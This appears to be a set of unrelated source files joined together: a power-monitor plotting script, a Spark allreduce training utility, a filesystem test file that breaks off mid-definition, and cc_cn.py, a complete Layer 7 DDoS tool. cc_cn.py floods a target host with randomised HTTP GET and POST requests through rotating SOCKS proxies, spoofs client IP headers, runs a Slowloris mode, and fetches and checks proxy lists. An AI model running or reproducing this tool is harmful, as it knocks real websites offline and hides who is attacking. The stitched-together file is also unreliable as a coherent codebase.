line.set_ydata(samples_queue) # update the data
ax.relim()
for label in ax.xaxis.get_ticklabels()[::100]:
label.set_visible(False)
ax.autoscale_view(True, True, True)
return line,
def sample_generator(sampler, sample_number_):
sampler.startSampling(sample_number_, output_callback=samples_callback)
def samples_callback(samples_):
last_values = samples_[sampleEngine.channels.MainCurrent]
if last_values:
# clamp negative readings to zero
valid_values = [max(v, 0) for v in last_values]
time_queue.extend(samples_[sampleEngine.channels.timeStamp])
samples_queue.extend(valid_values)
avg = sum(valid_values) / len(valid_values)
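# Trigger logic: while the window average stays above the threshold, samples are streamed to CSV; the file is closed once it falls back below.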
global triggered
if avg > trigger:
global csv_file_handle, csv_writer
if csv_file_handle:
print("recording", avg, len(valid_values))
records = list(zip(samples_[sampleEngine.channels.timeStamp],
samples_[sampleEngine.channels.MainCurrent],
samples_[2]))
if not csv_writer:
csv_writer = csv.writer(csv_file_handle)
csv_writer.writerow(header)
csv_writer.writerows(records)
triggered = True
else:
if triggered and csv_file_handle:
print("stopped trigger")
csv_file_handle.close()
csv_file_handle = None
def on_click(_event):
global should_pause
if _event.dblclick:
should_pause ^= True
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument("-n", "--number_of_samples", type=int, default=-1,
help="number of power samples per second, default to -1 meaning sample infinitely")
parser.add_argument("-m", "--monsoon_model", choices=("lvpm", "hvpm", "l", "h", "black", "white", "b", "w"),
default="w",
help="Monsoon type, either white(w,l,lvpm) or black(b,h,hvpm)")
parser.add_argument("-s", "--save_file", type=str, default=None, # 'data/power_samples.csv',
help="file to save power samples")
parser.add_argument("-t", "--trigger", type=float, default=float("inf"),
help="threshold to trigger sampling, unit is mA")
args = parser.parse_args()
sample_number = args.number_of_samples if args.number_of_samples > 0 else sampleEngine.triggers.SAMPLECOUNT_INFINITE
monsoon_model = args.monsoon_model
if monsoon_model.startswith('l') or monsoon_model.startswith('w'):
monsoon = LVPM.Monsoon() # white
else:
monsoon = HVPM.Monsoon()
monsoon.setup_usb()
print("Monsoon Power Monitor Serial number: {}".format(monsoon.getSerialNumber()))
engine = sampleEngine.SampleEngine(monsoon)
trigger = args.trigger
if args.save_file:
dir_name = os.path.dirname(args.save_file)
if not os.path.exists(dir_name):
os.makedirs(dir_name)
if trigger < float("inf"): # set trigger
engine.disableCSVOutput()
# global csv_name
csv_file = args.save_file
csv_file_handle = open(csv_file, 'w')
else:
engine.enableCSVOutput(args.save_file)
else:
engine.disableCSVOutput()
engine.ConsoleOutput(True)
def signal_handler(_signal, _frame):
print('You pressed Ctrl+C, stopping Monsoon sampling and exiting!')
monsoon.stopSampling()
sys.exit(0)
def handle_close(_event):
print('You closed the figure, stopping Monsoon sampling and exiting!')
monsoon.stopSampling()
sys.exit(0)
fig.canvas.mpl_connect('close_event', handle_close)
fig.canvas.mpl_connect('button_press_event', on_click)
signal.signal(signal.SIGINT, signal_handler)
pt = threading.Thread(target=sample_generator, name='sample_generator', args=(engine, sample_number))
pt.daemon = True
pt.start()
ani = animation.FuncAnimation(fig, animate, interval=100)
plt.show()
|
cc_cn.py | #!/usr/bin/python3
#Coded by L330n123
#########################################
# I removed the mixed proxies flood #
# because in my perspective, it doesn't #
# give more performance when flooding. #
# -- L330n123 #
#########################################
'''
I'm working on Aoyama's update so this project will stop for a while
'''
import requests
import socket
import socks
import time
import random
import threading
import sys
import ssl
import datetime
#import multiprocessing #i'm working on it
print ('''
///// ///// /////////////
CCCCC/ CCCCC/ | CC-attack |/
CC/ CC/ |-----------|/
CC/ CC/ | Layer 7 |/
CC///// CC///// | ddos tool |/
CCCCC/ CCCCC/ |___________|/
>--------------------------------------------->
Python3 version Beta
C0d3d by L330n123
┌───────────────────────────────────────────────┐
│ Tos: Don't attack .gov website                │
├───────────────────────────────────────────────┤
│ New stuff:                                    │
│ + Customize Cookies                           │
│ + Customize data of post mode                 │
│ + Fast Port Re-use                            │
│ + Added Random client ip                      │
├───────────────────────────────────────────────┤
│ Link: https://www.54yuanma.com/               │
└───────────────────────────────────────────────┘''')
acceptall = [
"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\n",
"Accept-Encoding: gzip, deflate\r\n",
"Accept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\n",
"Accept: text/html, application/xhtml+xml, application/xml;q=0.9, */*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Charset: iso-8859-1\r\nAccept-Encoding: gzip\r\n",
"Accept: application/xml,application/xhtml+xml,text/html;q=0.9, text/plain;q=0.8,image/png,*/*;q=0.5\r\nAccept-Charset: iso-8859-1\r\n",
"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Encoding: br;q=1.0, gzip;q=0.8, *;q=0.1\r\nAccept-Language: utf-8, iso-8859-1;q=0.5, *;q=0.1\r\nAccept-Charset: utf-8, iso-8859-1;q=0.5\r\n",
"Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, application/x-shockwave-flash, application/msword, */*\r\nAccept-Language: en-US,en;q=0.5\r\n",
"Accept: text/html, application/xhtml+xml, image/jxr, */*\r\nAccept-Encoding: gzip\r\nAccept-Charset: utf-8, iso-8859-1;q=0.5\r\nAccept-Language: utf-8, iso-8859-1;q=0.5, *;q=0.1\r\n",
"Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/webp, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Encoding: gzip\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Charset: utf-8, iso-8859-1;q=0.5\r\n,"
"Accept: text/html, application/xhtml+xml, application/xml;q=0.9, */*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\n",
"Accept-Charset: utf-8, iso-8859-1;q=0.5\r\nAccept-Language: utf-8, iso-8859-1;q=0.5, *;q=0.1\r\n",
"Accept: text/html, application/xhtml+xml",
"Accept-Language: en-US,en;q=0.5\r\n",
"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Encoding: br;q=1.0, gzip;q=0.8, *;q=0.1\r\n",
"Accept: text/plain;q=0.8,image/png,*/*;q=0.5\r\nAccept-Charset: iso-8859-1\r\n",]
referers = [
"https://www.google.com/search?q=",
"https://check-host.net/",
"https://www.facebook.com/",
"https://www.youtube.com/",
"https://www.fbi.com/",
"https://www.bing.com/search?q=",
"https://r.search.yahoo.com/",
"https://www.cia.gov/index.html",
"https://www.police.gov.hk/",
"https://www.mjib.gov.tw/",
"https://www.president.gov.tw/",
"https://www.gov.hk",
"https://vk.com/profile.php?redirect=",
"https://www.usatoday.com/search/results?q=",
"https://help.baidu.com/searchResult?keywords=",
"https://steamcommunity.com/market/search?q=",
"https://www.ted.com/search?q=",
"https://play.google.com/store/search?q=",
]
data = ""
cookies = ""
strings = "asdfghjklqwertyuiopZXCVBNMQWERTYUIOPASDFGHJKLzxcvbnm1234567890&"
###################################################
Intn = random.randint  # local aliases; binding these once shaves attribute-lookup overhead in hot loops
Choice = random.choice
setsocks = socks.setdefaultproxy
###################################################
def getuseragent():
platform = Choice(['Macintosh', 'Windows', 'X11'])
if platform == 'Macintosh':
os = Choice(['68K', 'PPC', 'Intel Mac OS X'])
elif platform == 'Windows':
os = Choice(['Win3.11', 'WinNT3.51', 'WinNT4.0', 'Windows NT 5.0', 'Windows NT 5.1', 'Windows NT 5.2', 'Windows NT 6.0', 'Windows NT 6.1', 'Windows NT 6.2', 'Win 9x 4.90', 'WindowsCE', 'Windows XP', 'Windows 7', 'Windows 8', 'Windows NT 10.0; Win64; x64'])
elif platform == 'X11':
os = Choice(['Linux i686', 'Linux x86_64'])
browser = Choice(['chrome', 'firefox', 'ie'])
if browser == 'chrome':
webkit = str(Intn(500, 599))
version = str(Intn(0, 99)) + '.0' + str(Intn(0, 9999)) + '.' + str(Intn(0, 999))
return 'Mozilla/5.0 (' + os + ') AppleWebKit/' + webkit + '.0 (KHTML, like Gecko) Chrome/' + version + ' Safari/' + webkit
elif browser == 'firefox':
currentYear = datetime.date.today().year
year = str(Intn(2020, currentYear))
month = Intn(1, 12)
if month < 10:
month = '0' + str(month)
else:
month = str(month)
day = Intn(1, 30)
if day < 10:
day = '0' + str(day)
else:
day = str(day)
gecko = year + month + day
version = str(Intn(1, 72)) + '.0'
return 'Mozilla/5.0 (' + os + '; rv:' + version + ') Gecko/' + gecko + ' Firefox/' + version
elif browser == 'ie':
version = str(Intn(1, 99)) + '.0'
engine = str(Intn(1, 99)) + '.0'
option = Choice([True, False])
if option == True:
token = Choice(['.NET CLR', 'SV1', 'Tablet PC', 'Win64; IA64', 'Win64; x64', 'WOW64']) + '; '
else:
token = ''
return 'Mozilla/5.0 (compatible; MSIE ' + version + '; ' + os + '; ' + token + 'Trident/' + engine + ')'
def randomurl():
return str(Choice(strings)+str(Intn(0,271400281257))+Choice(strings)+str(Intn(0,271004281257))+Choice(strings) + Choice(strings)+str(Intn(0,271400281257))+Choice(strings)+str(Intn(0,271004281257))+Choice(strings))
def cc(socks_type):
connection = "Connection: Keep-Alive\r\n"
if cookies != "":
connection += "Cookies: "+str(cookies)+"\r\n"
err = 0
if port == 443 :
n = "HTTPS"
else:
n = "CC"
while True:
fake_ip = "X-Forwarded-For: "+str(Intn(1,255))+"."+str(Intn(0,255))+"."+str(Intn(0,255))+"."+str(Intn(0,255))+"\r\n"
fake_ip += "Client-IP: "+str(Intn(1,255))+"."+str(Intn(0,255))+"."+str(Intn(0,255))+"."+str(Intn(0,255))+"\r\n"
accept = Choice(acceptall)
referer = "Referer: "+Choice(referers)+ ip + url2 + "\r\n"
try:
proxy = Choice(proxies).strip().split(":")
if socks_type == 4:
setsocks(socks.PROXY_TYPE_SOCKS4, str(proxy[0]), int(proxy[1]), True)
if socks_type == 5:
setsocks(socks.PROXY_TYPE_SOCKS5, str(proxy[0]), int(proxy[1]), True)
if err > 10:
print("[!] Target or proxy maybe down| Changing proxy")
break
s = socks.socksocket()
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
if brute:
s.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
s.connect((str(ip), int(port)))
if port == 443:
ctx = ssl.SSLContext()
s = ctx.wrap_socket(s,server_hostname=ip)
print ("[*] "+n+" Flooding from | "+str(proxy[0])+":"+str(proxy[1]))
try:
for _ in range(multiple):
useragent = "User-Agent: " +getuseragent() + "\r\n"
get_host = "GET " + url2 + "?" + randomurl() + " HTTP/1.1\r\nHost: " + ip + "\r\n"
request = get_host + referer + useragent + accept + connection + fake_ip+"\r\n"
s.send(str.encode(request))
s.close()
except:
s.close()
except:#dirty fix
pass
err = err +1
cc(socks_type)
def post(socks_type):
global data
post_host = "POST " + url2 + " HTTP/1.1\r\nHost: " + ip + "\r\n"
content = "Content-Type: application/x-www-form-urlencoded\r\n"
refer = "Referer: http://"+ ip + url2 + "\r\n"
user_agent = "User-Agent: " + getuseragent() + "\r\n"
accept = Choice(acceptall)
if mode2 != "y":
data = str(random._urandom(16)) # You can enable bring data in HTTP Header
length = "Content-Length: "+str(len(data))+" \r\nConnection: Keep-Alive\r\n"
if cookies != "":
length += "Cookies: "+str(cookies)+"\r\n"
request = post_host + accept + refer + content + user_agent + length + "\n" + data + "\r\n\r\n"
proxy = Choice(proxies).strip().split(":")
err = 0
if port == 443 :
n = "HTTPS"
else:
n = "CC"
while True:
try:
proxy = Choice(proxies).strip().split(":")
if socks_type == 4:
setsocks(socks.PROXY_TYPE_SOCKS4, str(proxy[0]), int(proxy[1]), True)
if socks_type == 5:
setsocks(socks.PROXY_TYPE_SOCKS5, str(proxy[0]), int(proxy[1]), True)
if err > 10:
print("[!] Target or proxy maybe down| Changing proxy")
break
s = socks.socksocket()
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
if brute:
s.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
s.connect((str(ip), int(port)))
if str(port) == '443': # //AUTO Enable SSL MODE :)
ctx = ssl.SSLContext()
s = ctx.wrap_socket(s,server_hostname=ip)
print ("[*] "+n+" Post Flooding from | "+str(proxy[0])+":"+str(proxy[1]))
try:
for _ in range(multiple):
s.send(str.encode(request))
s.close()
except:
s.close()
except:
pass#dirty fix
err = err + 1
post(socks_type)
socket_list=[]
def slow(conn,socks_type):
try:#dirty fix
proxy = Choice(proxies).strip().split(":")
if socks_type == 4:
setsocks(socks.PROXY_TYPE_SOCKS4, str(proxy[0]), int(proxy[1]), True)
if socks_type == 5:
setsocks(socks.PROXY_TYPE_SOCKS5, str(proxy[0]), int(proxy[1]), True)
except:
print("[!] Something wrong in socks list")
slow(conn,socks_type)#restart
for _ in range(conn):
try:
s = socks.socksocket()
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
s.settimeout(0.6)
s.connect((str(ip), int(port)))
if str(port) == '443':
ctx = ssl.SSLContext()
s = ctx.wrap_socket(s,server_hostname=ip)
s.send("GET /?{} HTTP/1.1\r\n".format(Intn(0, 2000)).encode("utf-8"))# Slowloris format header
s.send("User-Agent: {}\r\n".format(getuseragent()).encode("utf-8"))
s.send("{}\r\n".format("Accept-language: en-US,en,q=0.5").encode("utf-8"))
if cookies != "":
s.send(("Cookies: "+str(cookies)+"\r\n").encode("utf-8"))
s.send(("Connection:keep-alive").encode("utf-8"))
socket_list.append(s)
sys.stdout.write("[*] Running Slow Attack || Connections: "+str(len(socket_list))+"\r")
sys.stdout.flush()
except:
s.close()
proxy = Choice(proxies).strip().split(":")#Only change proxy when error, increase the performance
if socks_type == 4:
setsocks(socks.PROXY_TYPE_SOCKS4, str(proxy[0]), int(proxy[1]), True)
if socks_type == 5:
setsocks(socks.PROXY_TYPE_SOCKS5, str(proxy[0]), int(proxy[1]), True)
sys.stdout.write("[*] Running Slow Attack || Connections: "+str(len(socket_list))+"\r")
sys.stdout.flush()
while True:
for s in list(socket_list):
try:
s.send("X-a: {}\r\n".format(Intn(1, 5000)).encode("utf-8"))
sys.stdout.write("[*] Running Slow Attack || Connections: "+str(len(socket_list))+"\r")
sys.stdout.flush()
except:
s.close()
socket_list.remove(s)
sys.stdout.write("[*] Running Slow Attack || Connections: "+str(len(socket_list))+"\r")
sys.stdout.flush()
proxy = Choice(proxies).strip().split(":")
if socks_type == 4:
setsocks(socks.PROXY_TYPE_SOCKS4, str(proxy[0]), int(proxy[1]), True)
if socks_type == 5:
setsocks(socks.PROXY_TYPE_SOCKS5, str(proxy[0]), int(proxy[1]), True)
for _ in range(conn - len(socket_list)):
try:
s.settimeout(1)
s.connect((str(ip), int(port)))
if str(port) == '443':
ctx = ssl.SSLContext()
s = ctx.wrap_socket(s,server_hostname=ip)
s.send("GET /?{} HTTP/1.1\r\n".format(Intn(0, 2000)).encode("utf-8"))# Slowloris format header
s.send("User-Agent: {}\r\n".format(getuseragent).encode("utf-8"))
s.send("{}\r\n".format("Accept-language: en-US,en,q=0.5").encode("utf-8"))
if cookies != "":
s.send(("Cookies: "+str(cookies)+"\r\n").encode("utf-8"))
s.send(("Connection:keep-alive").encode("utf-8"))
socket_list.append(s)
sys.stdout.write("[*] Running Slow Attack || Connections: "+str(len(socket_list))+"\r")
sys.stdout.flush()
except:
proxy = Choice(proxies).strip().split(":")
if socks_type == 4:
setsocks(socks.PROXY_TYPE_SOCKS4, str(proxy[0]), int(proxy[1]), True)
if socks_type == 5:
setsocks(socks.PROXY_TYPE_SOCKS5, str(proxy[0]), int(proxy[1]), True)
sys.stdout.write("[*] Running Slow Attack || Connections: "+str(len(socket_list))+"\r")
sys.stdout.flush()
pass
nums = 0
def checking(lines,socks_type,ms):#Proxy checker coded by Leeon123
global nums
global proxies
try:#dirty fix
proxy = lines.strip().split(":")
if socks_type == 4:
setsocks(socks.PROXY_TYPE_SOCKS4, str(proxy[0]), int(proxy[1]), True)
if socks_type == 5:
setsocks(socks.PROXY_TYPE_SOCKS5, str(proxy[0]), int(proxy[1]), True)
except:
proxies.remove(lines)
return
err = 0
while True:
if err == 3:
proxies.remove(lines)
break
try:
s = socks.socksocket()
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
s.settimeout(ms)#You can change by yourself
s.connect((str(ip), int(port)))
if port == 443:
ctx = ssl.SSLContext()
s = ctx.wrap_socket(s,server_hostname=ip)
s.send(str.encode("GET / HTTP/1.1\r\n\r\n"))
s.close()
break
except:
err +=1
nums += 1
def check_socks(ms):#Coded by Leeon123
global nums
thread_list=[]
for lines in list(proxies):
if choice == "5":
th = threading.Thread(target=checking,args=(lines,5,ms,))
th.start()
if choice == "4":
th = threading.Thread(target=checking,args=(lines,4,ms,))
th.start()
thread_list.append(th)
time.sleep(0.01)
sys.stdout.write("> Checked "+str(nums)+" proxies\r")
sys.stdout.flush()
for th in list(thread_list):
th.join()
sys.stdout.write("> Checked "+str(nums)+" proxies\r")
sys.stdout.flush()
print("\r\n> Checked all proxies, Total Worked:"+str(len(proxies)))
ans = input("> Do u want to save them in a file? (y/n, default=y)")
if ans == "y" or ans == "":
if choice == "4":
with open("socks4.txt", 'wb') as fp:
for lines in list(proxies):
fp.write(bytes(lines,encoding='utf8'))
fp.close()
print("> They are saved in socks4.txt.")
elif choice == "5":
with open("socks5.txt", 'wb') as fp:
for lines in list(proxies):
fp.write(bytes(lines,encoding='utf8'))
fp.close()
print("> They are saved in socks5.txt.")
def check_list(socks_file):
print("> Checking list")
temp = open(socks_file).readlines()
temp_list = []
for i in temp:
if i not in temp_list:
if ':' in i:
temp_list.append(i)
rfile = open(socks_file, "wb")
for i in list(temp_list):
rfile.write(bytes(i,encoding='utf-8'))
rfile.close()
def downloadsocks(choice):
if choice == "4":
f = open("socks4.txt",'wb')
try:
r = requests.get("https://api.proxyscrape.com/?request=displayproxies&proxytype=socks4&country=all&timeout=1000")
f.write(r.content)
except:
pass
try:
r = requests.get("https://www.proxy-list.download/api/v1/get?type=socks4")
f.write(r.content)
f.close()
except:
f.close()
try:#credit to All3xJ
import urllib.request
req = urllib.request.Request("https://www.socks-proxy.net/")
req.add_header("User-Agent", getuseragent)
sourcecode = urllib.request.urlopen(req)
part = str(sourcecode.read())
part = part.split("<tbody>")
part = part[1].split("</tbody>")
part = part[0].split("<tr><td>")
proxies = ""
for proxy in part:
proxy = proxy.split("</td><td>")
try:
proxies=proxies + proxy[0] + ":" + proxy[1] + "\n"
except:
pass
out_file = open("socks4.txt","a")
out_file.write(proxies)
out_file.close()
except:
pass
print("> Have already downloaded socks4 list as socks4.txt")
if choice == "5":
f = open("socks5.txt",'wb')
try:
r = requests.get("https://api.proxyscrape.com/?request=displayproxies&proxytype=socks5&country=all")
f.write(r.content)
except:
pass
try:
r = requests.get("https://www.proxy-list.download/api/v1/get?type=socks5")
f.write(r.content)
f.close()
except:
f.close()
print("> Have already downloaded socks5 list as socks5.txt")
def main():
global ip
global url2
global port
global proxies
global multiple
global choice
global data
global mode2
global cookies
global brute
ip = ""
port = ""
mode = ""
print("> Mode: [cc/post/slow/check]")
while mode == "" :
mode = str(input("> Select attack mode (default=cc):")).strip()
if mode == "":
mode = "cc"
elif(mode != "cc") and (mode != "post")and(mode != "slow" )and(mode !="check"):
print("> ่ฏท่พๅ
ฅๆญฃ็กฎ็ๆจกๅผ")
mode = ""
continue
ip = str(input("> Host/Ip:"))
if ip == "":
print("> ่ฏท่พๅ
ฅๆญฃ็กฎ็ไธปๆบๆip")
sys.exit(1)
if mode == "slow" or mode == "check":
pass
else:
url = str(input("> ่พๅ
ฅไฝ ่ฆๆปๅป็้กต้ข(default=/):"))
if url == "":
url2 = "/"
else:
url2 = url
port = str(input("> Attack port (HTTPS is 443):"))
if port == '':
port = int(80)
print("> ้ป่ฎค้ๆฉ็ซฏๅฃ 80\r\n> ๅทฒ้ๆฉ็ซฏๅฃ 80 ")
else:
port = int(port)
if str(port) == '443':
print("> [!] ๅฏ็จSSLๆจกๅผ")
if mode == "post":
mode2 = str(input("> Customize POST data? (y/n, default=n):")).strip()
if mode2 == "y":
data = open(input("> ่พๅ
ฅๆไปถ่ทฏๅพ:").strip()).readlines()
data = ' '.join([str(txt) for txt in data])
choice2 = str(input("> Customize cookies? (y/n, default=n):")).strip()
if choice2 == "y":
cookies = str(input("่ฏท่พๅ
ฅ cookies:")).strip()
choice = ""
while choice == "":
choice = str(input("> Select SOCKS proxy version (4/5, default=5):")).strip()
if choice == "":
choice = "5"
if choice != "4" and choice != "5":
print("> [!] ้่ฏฏ้ๆฉ่ฏท้่ฏ")
choice = ""
if choice == "4":
socks_type = 4
else:
socks_type = 5
if mode == "check":
N = str(input("> Download proxy list automatically? (y/n, default=y):"))
if N == 'y' or N == "" :
downloadsocks(choice)
else:
pass
if choice == "4":
out_file = str(input("> Socks4 Proxy file path(socks4.txt):"))
if out_file == '':
out_file = str("socks4.txt")
else:
out_file = str(out_file)
check_list(out_file)
proxies = open(out_file).readlines()
elif choice == "5":
out_file = str(input("> Socks5 Proxy file path(socks5.txt):"))
if out_file == '':
out_file = str("socks5.txt")
else:
out_file = str(out_file)
check_list(out_file)
proxies = open(out_file).readlines()
print ("> Number Of Socks%s Proxies: %s" %(choice,len(proxies)))
time.sleep(0.03)
ans = str(input("> Do u need to check the socks list?(y/n, defualt=y):"))
if ans == "":
ans = "y"
if ans == "y":
ms = str(input("> Delay of socks(seconds, default=1):"))
if ms == "":
ms = int(1)
else :
try:
ms = int(ms)
except :
ms = float(ms)
check_socks(ms)
print("> End of process")
return
if mode == "slow":
thread_num = str(input("> Connections(default=400):"))
else:
thread_num = str(input("> Attack threads (default=400):"))
if thread_num == "":
thread_num = int(400)
else:
try:
thread_num = int(thread_num)
except:
sys.exit("Error thread number")
N = str(input("> Download proxy list automatically? (y/n, default=y):"))
if N == 'y' or N == "" :
downloadsocks(choice)
else:
pass
if choice == "4":
out_file = str(input("> Socks4 Proxy file path(socks4.txt):"))
if out_file == '':
out_file = str("socks4.txt")
else:
out_file = str(out_file)
check_list(out_file)
proxies = open(out_file).readlines()
elif choice == "5":
out_file = str(input("> Socks5 Proxy file path(socks5.txt):"))
if out_file == '':
out_file = str("socks5.txt")
else:
out_file = str(out_file)
check_list(out_file)
proxies = open(out_file).readlines()
print ("> Number Of Socks%s Proxies: %s" %(choice,len(proxies)))
time.sleep(0.03)
ans = str(input("> Do you need to check the proxy list? (y/n, default=y):"))
if ans == "":
ans = "y"
if ans == "y":
ms = str(input("> Delay of socks(seconds, default=1):"))
if ms == "":
ms = int(1)
else :
try:
ms = int(ms)
except :
ms = float(ms)
check_socks(ms)
if mode == "slow":
input("Press Enter to continue.")
th = threading.Thread(target=slow,args=(thread_num,socks_type,))
th.setDaemon(True)
th.start()
else:
multiple = str(input("> ่พๅ
ฅๆพๅคงๅๆฐ(default=100):"))
if multiple == "":
multiple = int(100)
else:
multiple = int(multiple)
brute = str(input("> Enable boost mode [beta] (y/n, default=n):"))
if brute == "":
brute = False
elif brute == "y":
brute = True
elif brute == "n":
brute = False
input("ๆๅ่ฝฆ้ฎ็ปง็ปญ.")
if mode == "post":
for _ in range(thread_num):
th = threading.Thread(target = post,args=(socks_type,))
th.setDaemon(True)
th.start()
#print("Threads "+str(i+1)+" created")
elif mode == "cc":
for _ in range(thread_num):
th = threading.Thread(target = cc,args=(socks_type,))
th.setDaemon(True)
th.start()
#print("Threads "+str(i+1)+" created")
try:
while True:
pass
except KeyboardInterrupt:
sys.exit()
if __name__ == "__main__":
main()#Coded by Leeon123
|
allreduce.py | """
Utility functions to retrieve information about available services and to set up security for the Hops platform.
These utils facilitate development by hiding complexity for programs interacting with Hops services.
"""
import os
from hops import devices, tensorboard, hdfs
from hops.experiment_impl.util import experiment_utils
from hops import util
import pydoop.hdfs
import threading
import time
import socket
import json
from . import allreduce_reservation
def _run(sc, map_fun, run_id, local_logdir=False, name="no-name", evaluator=False):
"""
Args:
sc: Spark context.
map_fun: Training function to run on each executor.
run_id: Identifier of this run, used to build the log directory.
local_logdir: Whether TensorBoard logs are written to the local filesystem.
name: Name of the experiment.
evaluator: Whether the last worker should be turned into an evaluator.
Returns:
Tuple of (logdir, parsed contents of .outputs.json if present, else None).
"""
app_id = str(sc.applicationId)
num_executions = util.num_executors()
#Each TF task should be run on 1 executor
nodeRDD = sc.parallelize(range(num_executions), num_executions)
#Make SparkUI intuitive by grouping jobs
sc.setJobGroup(os.environ['ML_ID'], "{} | CollectiveAllReduceStrategy - Distributed Training".format(name))
server = allreduce_reservation.Server(num_executions)
server_addr = server.start()
#Force execution on executor, since GPU is located on executor
nodeRDD.foreachPartition(_prepare_func(app_id, run_id, map_fun, local_logdir, server_addr, evaluator, util.num_executors()))
logdir = experiment_utils._get_logdir(app_id, run_id)
print('Finished Experiment \n')
path_to_return = logdir + '/.outputs.json'
if pydoop.hdfs.path.exists(path_to_return):
with pydoop.hdfs.open(path_to_return, "r") as fi:
contents = fi.read()
fi.close()
return logdir, json.loads(contents)
return logdir, None
def _prepare_func(app_id, run_id, map_fun, local_logdir, server_addr, evaluator, num_executors):
"""
Args:
app_id: YARN application id, used to build the log directory.
run_id: Identifier of this run.
map_fun: Training function to run on each executor.
local_logdir: Whether TensorBoard logs are written to the local filesystem.
server_addr: Address of the reservation server used to assemble the cluster spec.
evaluator: Whether the last worker should be turned into an evaluator.
num_executors: Total number of executors participating.
Returns:
The wrapper function executed on each RDD partition.
"""
def _wrapper_fun(iter):
"""
Args:
iter: Partition iterator; each element is this executor's number.
Returns:
"""
for i in iter:
executor_num = i
experiment_utils._set_ml_id(app_id, run_id)
t = threading.Thread(target=devices._print_periodic_gpu_utilization)
if devices.get_num_gpus() > 0:
t.start()
is_chief = False
logdir = None
tb_hdfs_path = None
try:
host = experiment_utils._get_ip_address()
tmp_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
tmp_socket.bind(('', 0))
port = tmp_socket.getsockname()[1]
client = allreduce_reservation.Client(server_addr)
host_port = host + ":" + str(port)
client.register({"worker": host_port, "index": executor_num})
cluster = client.await_reservations()
tmp_socket.close()
client.close()
task_index = experiment_utils._find_index(host_port, cluster)
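# An index of -1 means this host:port is absent from the worker list, so it presumably holds the chief reservation.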
if task_index == -1:
cluster["task"] = {"type": "chief", "index": 0}
else:
cluster["task"] = {"type": "worker", "index": task_index}
evaluator_node = None
if evaluator:
last_worker_index = len(cluster["cluster"]["worker"])-1
evaluator_node = cluster["cluster"]["worker"][last_worker_index]
cluster["cluster"]["evaluator"] = [evaluator_node]
del cluster["cluster"]["worker"][last_worker_index]
if evaluator_node == host_port:
cluster["task"] = {"type": "evaluator", "index": 0}
print('TF_CONFIG: {} '.format(cluster))
if num_executors > 1:
os.environ["TF_CONFIG"] = json.dumps(cluster)
is_chief = (cluster["task"]["type"] == "chief")
is_evaluator = (cluster["task"]["type"] == "evaluator")
if is_chief:
logdir = experiment_utils._get_logdir(app_id, run_id)
tb_hdfs_path, tb_pid = tensorboard._register(logdir, logdir, executor_num, local_logdir=local_logdir)
elif is_evaluator:
logdir = experiment_utils._get_logdir(app_id, run_id)
tensorboard.events_logdir = logdir
logfile = experiment_utils._init_logger(experiment_utils._get_logdir(app_id, run_id), role=cluster["task"]["type"], index=cluster["task"]["index"])
print(devices._get_gpu_info())
print('-------------------------------------------------------')
print('Started running task')
task_start = time.time()
retval = map_fun()
if is_chief:
experiment_utils._handle_return_simple(retval, experiment_utils._get_logdir(app_id, run_id), logfile)
task_end = time.time()
time_str = 'Finished task - took ' + experiment_utils._time_diff(task_start, task_end)
print(time_str)
print('-------------------------------------------------------')
except:
raise
finally:
experiment_utils._cleanup(tensorboard, t)
return _wrapper_fun
|
test_fs.py | # Test fs.FS compatibility
import contextlib
import multiprocessing as mp
import os
import tempfile
import pytest
from moto import mock_s3
from parameterized import parameterized
from pfio.testing import ZipForTest, randstring
from pfio.v2 import S3, Local, Zip, from_url, lazify, open_url
@contextlib.contextmanager
def gen_fs(target):
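# Yields a throwaway filesystem: a mocked S3 bucket or a temporary local directory.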
if target == "s3":
bucket = "test-dummy-bucket"
with S3(bucket, create_bucket=True) as s3:
yield s3
# s3.client.delete_bucket(bucket)
elif target == "local":
with tempfile.TemporaryDirectory() as d:
yield Local(d)
else:
raise RuntimeError()
@parameterized.expand(["s3", "local"])
@mock_s3
def test_smoke(target):
filename = randstring()
filename2 = randstring()
content = randstring(1024) + '\n' + randstring(234)
with gen_fs(target) as fs:
with fs.open(filename, 'w') as fp:
fp.write(content)
with fs.open(filename, 'r') as fp:
assert content == fp.read()
with fs.open(filename, 'r') as fp:
lines = fp.readlines()
print(type(fp))
assert 2 == len(lines)
assert 1025 == len(lines[0])
assert 234 == len(lines[1])
assert filename in list(fs.list())
fs.mkdir('d')
with fs.open('d/foo', 'w') as fp:
fp.write(content + content)
with fs.open('d/foo', 'r') as fp:
assert (content + content) == fp.read()
print('recursive:', list(fs.list(recursive=True)))
print('non-rec:', list(fs.list(recursive=False)))
assert filename in list(fs.list())
assert 2 == len(list(fs.list(recursive=False)))
assert 'd/' in list(fs.list(recursive=False))
assert 'foo' in list(fs.list('d/'))
st = fs.stat(filename)
assert len(content) == st.size
assert st.filename is not None
assert st.last_modified is not None
assert type(st.last_modified) == float
with fs.open(filename2, 'wb') as fp:
fp.write(content.encode())
with fs.open(filename2, 'rb') as fp:
buf2 = fp.read()
assert content == buf2.decode()
with fs.open(filename2, 'r') as fp:
buf3 = fp.read()
assert content == buf3
fs.remove(filename)
fs.remove(filename2)
assert not fs.exists(filename)
assert not fs.is_forked
subfs = fs.subfs('d')
assert subfs.exists('foo')
def test_from_url_force_type():
